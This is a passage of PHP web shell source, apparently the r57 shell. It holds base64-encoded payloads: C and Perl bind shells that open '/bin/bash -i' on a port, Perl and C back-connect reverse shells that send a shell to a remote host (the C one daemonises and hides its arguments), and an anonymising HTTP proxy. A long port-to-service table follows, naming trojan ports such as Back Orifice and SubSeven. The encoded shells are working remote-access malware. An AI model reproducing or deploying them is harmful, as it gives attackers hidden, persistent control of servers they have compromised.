GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
|
||||
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
|
||||
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
|
||||
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
|
||||
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
|
||||
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
|
||||
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
|
||||
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
|
||||
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
|
||||
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
|
||||
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
|
||||
$port_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
|
||||
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
|
||||
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
|
||||
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
|
||||
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
|
||||
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
|
||||
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
|
||||
lIENPTk47DQpleGl0IDA7DQp9DQp9";
|
||||
$back_connect_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
|
||||
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
|
||||
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
|
||||
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
|
||||
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
|
||||
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
|
||||
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
|
||||
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
|
||||
BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb
|
||||
SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd
|
||||
KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ
|
||||
sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC
|
||||
Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D
|
||||
QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp
|
||||
Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
|
||||
$prx1="IyEvaG9tZS9tZXJseW4vYmluL3BlcmwgLXcNCiMjIw0KIyMjaHR0cDovL2ZvcnVtLndlYi1oYWNrLnJ1L2luZGV4LnBocD9zaG93dG9waWM9
|
||||
MjY3MDYmc3Q9MCYjZW50cnkyNDYzNDQNCiMjIw0KDQp1c2Ugc3RyaWN0Ow0KJEVOVntQQVRIfSA9IGpvaW4gXCI6XCIsIHF3KC91c3IvdWNiIC9iaW4
|
||||
gL3Vzci9iaW4pOw0KJHwrKzsNCg0KIyMgQ29weXJpZ2h0IChjKSAxOTk2IGJ5IFJhbmRhbCBMLiBTY2h3YXJ0eg0KIyMgVGhpcyBwcm9ncmFtIGlzIG
|
||||
ZyZWUgc29mdHdhcmU7IHlvdSBjYW4gcmVkaXN0cmlidXRlIGl0DQojIyBhbmQvb3IgbW9kaWZ5IGl0IHVuZGVyIHRoZSBzYW1lIHRlcm1zIGFzIFBlc
|
||||
mwgaXRzZWxmLg0KDQojIyBBbm9ueW1vdXMgSFRUUCBwcm94eSAoaGFuZGxlcyBodHRwOiwgZ29waGVyOiwgZnRwOikNCiMjIHJlcXVpcmVzIExXUCA1
|
||||
LjA0IG9yIGxhdGVyDQoNCm15ICRIT1NUID0gXCJsb2NhbGhvc3RcIjsNCm15ICRQT1JUID0gXCI=";
|
||||
$prx2="XCI7DQoNCnN1YiBwcmVmaXggew0KIG15ICRub3cgPSBsb2NhbHRpbWU7DQoNCiBqb2luIFwiXCIsIG1hcCB7IFwiWyRub3ddIFskeyR9XSAk
|
||||
X1xcblwiIH0gc3BsaXQgL1xcbi8sIGpvaW4gXCJcIiwgQF87DQp9DQoNCiRTSUd7X19XQVJOX199ID0gc3ViIHsgd2FybiBwcmVmaXggQF8gfTsNCiR
|
||||
TSUd7X19ESUVfX30gPSBzdWIgeyBkaWUgcHJlZml4IEBfIH07DQokU0lHe0NMRH0gPSAkU0lHe0NITER9ID0gc3ViIHsgd2FpdDsgfTsNCg0KbXkgJE
|
||||
FHRU5UOyAgICMgZ2xvYmFsIHVzZXIgYWdlbnQgKGZvciBlZmZpY2llbmN5KQ0KQkVHSU4gew0KIHVzZSBMV1A6OlVzZXJBZ2VudDsNCg0KIEBNeUFnZ
|
||||
W50OjpJU0EgPSBxdyhMV1A6OlVzZXJBZ2VudCk7ICMgc2V0IGluaGVyaXRhbmNlDQoNCiAkQUdFTlQgPSBNeUFnZW50LT5uZXc7DQogJEFHRU5ULT5h
|
||||
Z2VudChcImFub24vMC4wN1wiKTsNCiAkQUdFTlQtPmVudl9wcm94eTsNCn0NCg0Kc3ViIE15QWdlbnQ6OnJlZGlyZWN0X29rIHsgMCB9ICMgcmVkaXJ
|
||||
lY3RzIHNob3VsZCBwYXNzIHRocm91Z2gNCg0KeyAgICAjIyMgTUFJTiAjIyMNCiB1c2UgSFRUUDo6RGFlbW9uOw0KDQogbXkgJG1hc3RlciA9IG5ldy
|
||||
BIVFRQOjpEYWVtb24NCiAgIExvY2FsQWRkciA9PiAkSE9TVCwgTG9jYWxQb3J0ID0+ICRQT1JUOw0KIHdhcm4gXCJzZXQgeW91ciBwcm94eSB0byA8V
|
||||
VJMOlwiLCAkbWFzdGVyLT51cmwsIFwiPlwiOw0KIG15ICRzbGF2ZTsNCiAmaGFuZGxlX2Nvbm5lY3Rpb24oJHNsYXZlKSB3aGlsZSAkc2xhdmUgPSAk
|
||||
bWFzdGVyLT5hY2NlcHQ7DQogZXhpdCAwOw0KfSAgICAjIyMgRU5EIE1BSU4gIyMjDQoNCnN1YiBoYW5kbGVfY29ubmVjdGlvbiB7DQogbXkgJGNvbm5
|
||||
lY3Rpb24gPSBzaGlmdDsgIyBIVFRQOjpEYWVtb246OkNsaWVudENvbm4NCg0KIG15ICRwaWQgPSBmb3JrOw0KIGlmICgkcGlkKSB7ICAgIyBzcGF3bi
|
||||
BPSywgYW5kIElcJ20gdGhlIHBhcmVudA0KICAgY2xvc2UgJGNvbm5lY3Rpb247DQogICByZXR1cm47DQogfQ0KICMjIHNwYXduIGZhaWxlZCwgb3IgS
|
||||
VwnbSBhIGdvb2QgY2hpbGQNCiBteSAkcmVxdWVzdCA9ICRjb25uZWN0aW9uLT5nZXRfcmVxdWVzdDsNCiBpZiAoZGVmaW5lZCgkcmVxdWVzdCkpIHsN
|
||||
CiAgIG15ICRyZXNwb25zZSA9ICZmZXRjaF9yZXF1ZXN0KCRyZXF1ZXN0KTsNCiAgICRjb25uZWN0aW9uLT5zZW5kX3Jlc3BvbnNlKCRyZXNwb25zZSk
|
||||
7DQogICBjbG9zZSAkY29ubmVjdGlvbjsNCiB9DQogZXhpdCAwIGlmIGRlZmluZWQgJHBpZDsgIyBleGl0IGlmIElcJ20gYSBnb29kIGNoaWxkIHdpdG
|
||||
ggYSBnb29kIHBhcmVudA0KfQ0KDQpzdWIgZmV0Y2hfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgICMgSFRUUDo6UmVxdWVzdA0KDQogd
|
||||
XNlIEhUVFA6OlJlc3BvbnNlOw0KDQogbXkgJHVybCA9ICRyZXF1ZXN0LT51cmw7DQogd2FybiBcImZldGNoaW5nICR1cmxcIjsNCiBpZiAoJHVybC0+
|
||||
c2NoZW1lICF+IC9eKGh0dHB8Z29waGVyfGZ0cCkkLykgew0KICAgbXkgJHJlcyA9IEhUVFA6OlJlc3BvbnNlLT5uZXcoNDAzLCBcIkZvcmJpZGRlblw
|
||||
iKTsNCiAgICRyZXMtPmNvbnRlbnQoXCJiYWQgc2NoZW1lOiBAe1skdXJsLT5zY2hlbWVdfVxcblwiKTsNCiAgICRyZXM7DQogfSBlbHNpZiAobm90IC
|
||||
R1cmwtPnJlbC0+bmV0bG9jKSB7DQogICBteSAkcmVzID0gSFRUUDo6UmVzcG9uc2UtPm5ldyg0MDMsIFwiRm9yYmlkZGVuXCIpOw0KICAgJHJlcy0+Y
|
||||
29udGVudChcInJlbGF0aXZlIFVSTCBub3QgcGVybWl0dGVkXFxuXCIpOw0KICAgJHJlczsNCiB9IGVsc2Ugew0KICAgJmZldGNoX3ZhbGlkYXRlZF9y
|
||||
ZXF1ZXN0KCRyZXF1ZXN0KTsNCiB9DQp9DQoNCnN1YiBmZXRjaF92YWxpZGF0ZWRfcmVxdWVzdCB7DQogbXkgJHJlcXVlc3QgPSBzaGlmdDsgIyBIVFR
|
||||
QOjpSZXF1ZXN0DQoNCiAjIyB1c2VzIGdsb2JhbCAkQUdFTlQNCg0KICMjIHdhcm4gXCJvcmlnIHJlcXVlc3Q6IDw8PFwiLCAkcmVxdWVzdC0+aGVhZG
|
||||
Vyc19hc19zdHJpbmcsIFwiPj4+XCI7DQogJHJlcXVlc3QtPnJlbW92ZV9oZWFkZXIocXcoVXNlci1BZ2VudCBGcm9tIFJlZmVyZXIgQ29va2llKSk7D
|
||||
QogIyMgd2FybiBcImFub24gcmVxdWVzdDogPDw8XCIsICRyZXF1ZXN0LT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiBteSAkcmVzcG9uc2Ug
|
||||
PSAkQUdFTlQtPnJlcXVlc3QoJHJlcXVlc3QpOw0KICMjIHdhcm4gXCJvcmlnIHJlc3BvbnNlOiA8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N
|
||||
0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2UtPnJlbW92ZV9oZWFkZXIocXcoU2V0LUNvb2tpZSkpOw0KICMjIHdhcm4gXCJhbm9uIHJlc3BvbnNlOi
|
||||
A8PDxcIiwgJHJlc3BvbnNlLT5oZWFkZXJzX2FzX3N0cmluZywgXCI+Pj5cIjsNCiAkcmVzcG9uc2U7DQp9";
|
||||
$port[1] = "tcpmux (TCP Port Service Multiplexer)";
|
||||
$port[2] = "Management Utility";
|
||||
$port[3] = "Compression Process";
|
||||
$port[5] = "rje (Remote Job Entry)";
|
||||
$port[7] = "echo";
|
||||
$port[9] = "discard";
|
||||
$port[11] = "systat";
|
||||
$port[13] = "daytime";
|
||||
$port[15] = "netstat";
|
||||
$port[17] = "quote of the day";
|
||||
$port[18] = "send/rwp";
|
||||
$port[19] = "character generator";
|
||||
$port[20] = "ftp-data";
|
||||
$port[21] = "ftp";
|
||||
$port[22] = "ssh, pcAnywhere";
|
||||
$port[23] = "Telnet";
|
||||
$port[25] = "SMTP (Simple Mail Transfer)";
|
||||
$port[27] = "ETRN (NSW User System FE)";
|
||||
$port[29] = "MSG ICP";
|
||||
$port[31] = "MSG Authentication";
|
||||
$port[33] = "dsp (Display Support Protocol)";
|
||||
$port[37] = "time";
|
||||
$port[38] = "RAP (Route Access Protocol)";
|
||||
$port[39] = "rlp (Resource Location Protocol)";
|
||||
$port[41] = "Graphics";
|
||||
$port[42] = "nameserv, WINS";
|
||||
$port[43] = "whois, nickname";
|
||||
$port[44] = "MPM FLAGS Protocol";
|
||||
$port[45] = "Message Processing Module [recv]";
|
||||
$port[46] = "MPM [default send]";
|
||||
$port[47] = "NI FTP";
|
||||
$port[48] = "Digital Audit Daemon";
|
||||
$port[49] = "TACACS, Login Host Protocol";
|
||||
$port[50] = "RMCP, re-mail-ck";
|
||||
$port[53] = "DNS";
|
||||
$port[57] = "MTP (any private terminal access)";
|
||||
$port[59] = "NFILE";
|
||||
$port[60] = "Unassigned";
|
||||
$port[61] = "NI MAIL";
|
||||
$port[62] = "ACA Services";
|
||||
$port[63] = "whois++";
|
||||
$port[64] = "Communications Integrator (CI)";
|
||||
$port[65] = "TACACS-Database Service";
|
||||
$port[66] = "Oracle SQL*NET";
|
||||
$port[67] = "bootps (Bootstrap Protocol Server)";
|
||||
$port[68] = "bootpd/dhcp (Bootstrap Protocol Client)";
|
||||
$port[69] = "Trivial File Transfer Protocol (tftp)";
|
||||
$port[70] = "Gopher";
|
||||
$port[71] = "Remote Job Service";
|
||||
$port[72] = "Remote Job Service";
|
||||
$port[73] = "Remote Job Service";
|
||||
$port[74] = "Remote Job Service";
|
||||
$port[75] = "any private dial out service";
|
||||
$port[76] = "Distributed External Object Store";
|
||||
$port[77] = "any private RJE service";
|
||||
$port[78] = "vettcp";
|
||||
$port[79] = "finger";
|
||||
$port[80] = "World Wide Web HTTP";
|
||||
$port[81] = "HOSTS2 Name Serve";
|
||||
$port[82] = "XFER Utility";
|
||||
$port[83] = "MIT ML Device";
|
||||
$port[84] = "Common Trace Facility";
|
||||
$port[85] = "MIT ML Device";
|
||||
$port[86] = "Micro Focus Cobol";
|
||||
$port[87] = "any private terminal link";
|
||||
$port[88] = "Kerberos, WWW";
|
||||
$port[89] = "SU/MIT Telnet Gateway";
|
||||
$port[90] = "DNSIX Securit Attribute Token Map";
|
||||
$port[91] = "MIT Dover Spooler";
|
||||
$port[92] = "Network Printing Protocol";
|
||||
$port[93] = "Device Control Protocol";
|
||||
$port[94] = "Tivoli Object Dispatcher";
|
||||
$port[95] = "supdup";
|
||||
$port[96] = "DIXIE";
|
||||
$port[98] = "linuxconf";
|
||||
$port[99] = "Metagram Relay";
|
||||
$port[100] = "[unauthorized use]";
|
||||
$port[101] = "HOSTNAME";
|
||||
$port[102] = "ISO, X.400, ITOT";
|
||||
$port[103] = "Genesis Point-to-Point";
|
||||
$port[104] = "ACR-NEMA Digital Imag. & Comm. 300";
|
||||
$port[105] = "CCSO name server protocol";
|
||||
$port[106] = "poppassd";
|
||||
$port[107] = "Remote Telnet Service";
|
||||
$port[108] = "SNA Gateway Access Server";
|
||||
$port[109] = "POP2";
|
||||
$port[110] = "POP3";
|
||||
$port[111] = "Sun RPC Portmapper";
|
||||
$port[112] = "McIDAS Data Transmission Protocol";
|
||||
$port[113] = "Authentication Service";
|
||||
$port[115] = "sftp (Simple File Transfer Protocol)";
|
||||
$port[116] = "ANSA REX Notify";
|
||||
$port[117] = "UUCP Path Service";
|
||||
$port[118] = "SQL Services";
|
||||
$port[119] = "NNTP";
|
||||
$port[120] = "CFDP";
|
||||
$port[123] = "NTP";
|
||||
$port[124] = "SecureID";
|
||||
$port[129] = "PWDGEN";
|
||||
$port[133] = "statsrv";
|
||||
$port[135] = "loc-srv/epmap";
|
||||
$port[137] = "netbios-ns";
|
||||
$port[138] = "netbios-dgm (UDP)";
|
||||
$port[139] = "NetBIOS";
|
||||
$port[143] = "IMAP";
|
||||
$port[144] = "NewS";
|
||||
$port[150] = "SQL-NET";
|
||||
$port[152] = "BFTP";
|
||||
$port[153] = "SGMP";
|
||||
$port[156] = "SQL Service";
|
||||
$port[161] = "SNMP";
|
||||
$port[175] = "vmnet";
|
||||
$port[177] = "XDMCP";
|
||||
$port[178] = "NextStep Window Server";
|
||||
$port[179] = "BGP";
|
||||
$port[180] = "SLmail admin";
|
||||
$port[199] = "smux";
|
||||
$port[210] = "Z39.50";
|
||||
$port[213] = "IPX";
|
||||
$port[218] = "MPP";
|
||||
$port[220] = "IMAP3";
|
||||
$port[256] = "RAP";
|
||||
$port[257] = "Secure Electronic Transaction";
|
||||
$port[258] = "Yak Winsock Personal Chat";
|
||||
$port[259] = "ESRO";
|
||||
$port[264] = "FW1_topo";
|
||||
$port[311] = "Apple WebAdmin";
|
||||
$port[350] = "MATIP type A";
|
||||
$port[351] = "MATIP type B";
|
||||
$port[363] = "RSVP tunnel";
|
||||
$port[366] = "ODMR (On-Demand Mail Relay)";
|
||||
$port[371] = "Clearcase";
|
||||
$port[387] = "AURP (AppleTalk Update-Based Routing Protocol)";
|
||||
$port[389] = "LDAP";
|
||||
$port[407] = "Timbuktu";
|
||||
$port[427] = "Server Location";
|
||||
$port[434] = "Mobile IP";
|
||||
$port[443] = "ssl";
|
||||
$port[444] = "snpp, Simple Network Paging Protocol";
|
||||
$port[445] = "SMB";
|
||||
$port[458] = "QuickTime TV/Conferencing";
|
||||
$port[468] = "Photuris";
|
||||
$port[475] = "tcpnethaspsrv";
|
||||
$port[500] = "ISAKMP, pluto";
|
||||
$port[511] = "mynet-as";
|
||||
$port[512] = "biff, rexec";
|
||||
$port[513] = "who, rlogin";
|
||||
$port[514] = "syslog, rsh";
|
||||
$port[515] = "lp, lpr, line printer";
|
||||
$port[517] = "talk";
|
||||
$port[520] = "RIP (Routing Information Protocol)";
|
||||
$port[521] = "RIPng";
|
||||
$port[522] = "ULS";
|
||||
$port[531] = "IRC";
|
||||
$port[543] = "KLogin, AppleShare over IP";
|
||||
$port[545] = "QuickTime";
|
||||
$port[548] = "AFP";
|
||||
$port[554] = "Real Time Streaming Protocol";
|
||||
$port[555] = "phAse Zero";
|
||||
$port[563] = "NNTP over SSL";
|
||||
$port[575] = "VEMMI";
|
||||
$port[581] = "Bundle Discovery Protocol";
|
||||
$port[593] = "MS-RPC";
|
||||
$port[608] = "SIFT/UFT";
|
||||
$port[626] = "Apple ASIA";
|
||||
$port[631] = "IPP (Internet Printing Protocol)";
|
||||
$port[635] = "RLZ DBase";
|
||||
$port[636] = "sldap";
|
||||
$port[642] = "EMSD";
|
||||
$port[648] = "RRP (NSI Registry Registrar Protocol)";
|
||||
$port[655] = "tinc";
|
||||
$port[660] = "Apple MacOS Server Admin";
|
||||
$port[666] = "Doom";
|
||||
$port[674] = "ACAP";
|
||||
$port[687] = "AppleShare IP Registry";
|
||||
$port[700] = "buddyphone";
|
||||
$port[705] = "AgentX for SNMP";
|
||||
$port[901] = "swat, realsecure";
|
||||
$port[993] = "s-imap";
|
||||
$port[995] = "s-pop";
|
||||
$port[1024] = "Reserved";
|
||||
$port[1025] = "network blackjack";
|
||||
$port[1062] = "Veracity";
|
||||
$port[1080] = "SOCKS";
|
||||
$port[1085] = "WebObjects";
|
||||
$port[1227] = "DNS2Go";
|
||||
$port[1243] = "SubSeven";
|
||||
$port[1338] = "Millennium Worm";
|
||||
$port[1352] = "Lotus Notes";
|
||||
$port[1381] = "Apple Network License Manager";
|
||||
$port[1417] = "Timbuktu Service 1 Port";
|
||||
$port[1418] = "Timbuktu Service 2 Port";
|
||||
$port[1419] = "Timbuktu Service 3 Port";
|
||||
$port[1420] = "Timbuktu Service 4 Port";
|
||||
$port[1433] = "Microsoft SQL Server";
|
||||
$port[1434] = "Microsoft SQL Monitor";
|
||||
$port[1477] = "ms-sna-server";
|
||||
$port[1478] = "ms-sna-base";
|
||||
$port[1490] = "insitu-conf";
|
||||
$port[1494] = "Citrix ICA Protocol";
|
||||
$port[1498] = "Watcom-SQL";
|
||||
$port[1500] = "VLSI License Manager";
|
||||
$port[1503] = "T.120";
|
||||
$port[1521] = "Oracle SQL";
|
||||
$port[1522] = "Ricardo North America License Manager";
|
||||
$port[1524] = "ingres";
|
||||
$port[1525] = "prospero";
|
||||
$port[1526] = "prospero";
|
||||
$port[1527] = "tlisrv";
|
||||
$port[1529] = "oracle";
|
||||
$port[1547] = "laplink";
|
||||
$port[1604] = "Citrix ICA, MS Terminal Server";
|
||||
$port[1645] = "RADIUS Authentication";
|
||||
$port[1646] = "RADIUS Accounting";
|
||||
$port[1680] = "Carbon Copy";
|
||||
$port[1701] = "L2TP/LSF";
|
||||
$port[1717] = "Convoy";
|
||||
$port[1720] = "H.323/Q.931";
|
||||
$port[1723] = "PPTP control port";
|
||||
$port[1731] = "MSICCP";
|
||||
$port[1755] = "Windows Media .asf";
|
||||
$port[1758] = "TFTP multicast";
|
||||
$port[1761] = "cft-0";
|
||||
$port[1762] = "cft-1";
|
||||
$port[1763] = "cft-2";
|
||||
$port[1764] = "cft-3";
|
||||
$port[1765] = "cft-4";
|
||||
$port[1766] = "cft-5";
|
||||
$port[1767] = "cft-6";
|
||||
$port[1808] = "Oracle-VP2";
|
||||
$port[1812] = "RADIUS server";
|
||||
$port[1813] = "RADIUS accounting";
|
||||
$port[1818] = "ETFTP";
|
||||
$port[1973] = "DLSw DCAP/DRAP";
|
||||
$port[1985] = "HSRP";
|
||||
$port[1999] = "Cisco AUTH";
|
||||
$port[2001] = "glimpse";
|
||||
$port[2049] = "NFS";
|
||||
$port[2064] = "distributed.net";
|
||||
$port[2065] = "DLSw";
|
||||
$port[2066] = "DLSw";
|
||||
$port[2106] = "MZAP";
|
||||
$port[2140] = "DeepThroat";
|
||||
$port[2301] = "Compaq Insight Management Web Agents";
|
||||
$port[2327] = "Netscape Conference";
|
||||
$port[2336] = "Apple UG Control";
|
||||
$port[2427] = "MGCP gateway";
|
||||
$port[2504] = "WLBS";
|
||||
$port[2535] = "MADCAP";
|
||||
$port[2543] = "sip";
|
||||
$port[2592] = "netrek";
|
||||
$port[2727] = "MGCP call agent";
|
||||
$port[2628] = "DICT";
|
||||
$port[2998] = "ISS Real Secure Console Service Port";
|
||||
$port[3000] = "Firstclass";
|
||||
$port[3001] = "Redwood Broker";
|
||||
$port[3031] = "Apple AgentVU";
|
||||
$port[3128] = "squid";
|
||||
$port[3130] = "ICP";
|
||||
$port[3150] = "DeepThroat";
|
||||
$port[3264] = "ccmail";
|
||||
$port[3283] = "Apple NetAssitant";
|
||||
$port[3288] = "COPS";
|
||||
$port[3305] = "ODETTE";
|
||||
$port[3306] = "mySQL";
|
||||
$port[3389] = "RDP Protocol (Terminal Server)";
|
||||
$port[3521] = "netrek";
|
||||
$port[4000] = "icq, command-n-conquer and shell nfm";
|
||||
$port[4321] = "rwhois";
|
||||
$port[4333] = "mSQL";
|
||||
$port[4444] = "KRB524";
|
||||
$port[4827] = "HTCP";
|
||||
$port[5002] = "radio free ethernet";
|
||||
$port[5004] = "RTP";
|
||||
$port[5005] = "RTP";
|
||||
$port[5010] = "Yahoo! Messenger";
|
||||
$port[5050] = "multimedia conference control tool";
|
||||
$port[5060] = "SIP";
|
||||
$port[5150] = "Ascend Tunnel Management Protocol";
|
||||
$port[5190] = "AIM";
|
||||
$port[5500] = "securid";
|
||||
$port[5501] = "securidprop";
|
||||
$port[5423] = "Apple VirtualUser";
|
||||
$port[5555] = "Personal Agent";
|
||||
$port[5631] = "PCAnywhere data";
|
||||
$port[5632] = "PCAnywhere";
|
||||
$port[5678] = "Remote Replication Agent Connection";
|
||||
$port[5800] = "VNC";
|
||||
$port[5801] = "VNC";
|
||||
$port[5900] = "VNC";
|
||||
$port[5901] = "VNC";
|
||||
$port[6000] = "X Windows";
|
||||
$port[6112] = "BattleNet";
|
||||
$port[6502] = "Netscape Conference";
|
||||
$port[6667] = "IRC";
|
||||
$port[6670] = "VocalTec Internet Phone, DeepThroat";
|
||||
$port[6699] = "napster";
|
||||
$port[6776] = "Sub7";
|
||||
$port[6970] = "RTP";
|
||||
$port[7007] = "MSBD, Windows Media encoder";
|
||||
$port[7070] = "RealServer/QuickTime";
|
||||
$port[7777] = "cbt";
|
||||
$port[7778] = "Unreal";
|
||||
$port[7648] = "CU-SeeMe";
|
||||
$port[7649] = "CU-SeeMe";
|
||||
$port[8000] = "iRDMI/Shoutcast Server";
|
||||
$port[8010] = "WinGate 2.1";
|
||||
$port[8080] = "HTTP";
|
||||
$port[8181] = "HTTP";
|
||||
$port[8383] = "IMail WWW";
|
||||
$port[8875] = "napster";
|
||||
$port[8888] = "napster";
|
||||
$port[8889] = "Desktop Data TCP 1";
|
||||
$port[8890] = "Desktop Data TCP 2";
|
||||
$port[8891] = "Desktop Data TCP 3: NESS application";
|
||||
$port[8892] = "Desktop Data TCP 4: FARM product";
|
||||
$port[8893] = "Desktop Data TCP 5: NewsEDGE/Web application";
|
||||
$port[8894] = "Desktop Data TCP 6: COAL application";
|
||||
$port[9000] = "CSlistener";
|
||||
$port[10008] = "cheese worm";
|
||||
$port[11371] = "PGP 5 Keyserver";
|
||||
$port[13223] = "PowWow";
|
||||
$port[13224] = "PowWow";
|
||||
$port[14237] = "Palm";
|
||||
$port[14238] = "Palm";
|
||||
$port[18888] = "LiquidAudio";
|
||||
$port[21157] = "Activision";
|
||||
$port[22555] = "Vocaltec Web Conference";
|
||||
$port[23213] = "PowWow";
|
||||
$port[23214] = "PowWow";
|
||||
$port[23456] = "EvilFTP";
|
||||
$port[26000] = "Quake";
|
||||
$port[27001] = "QuakeWorld";
|
||||
$port[27010] = "Half-Life";
|
||||
$port[27015] = "Half-Life";
|
||||
$port[27960] = "QuakeIII";
|
||||
$port[30029] = "AOL Admin";
|
||||
$port[31337] = "Back Orifice";
|
||||
$port[32777] = "rpc.walld";
|
||||
$port[45000] = "Cisco NetRanger postofficed";
|
||||
$port[32773] = "rpc bserverd";
|
||||
$port[32776] = "rpc.spray";
|
||||
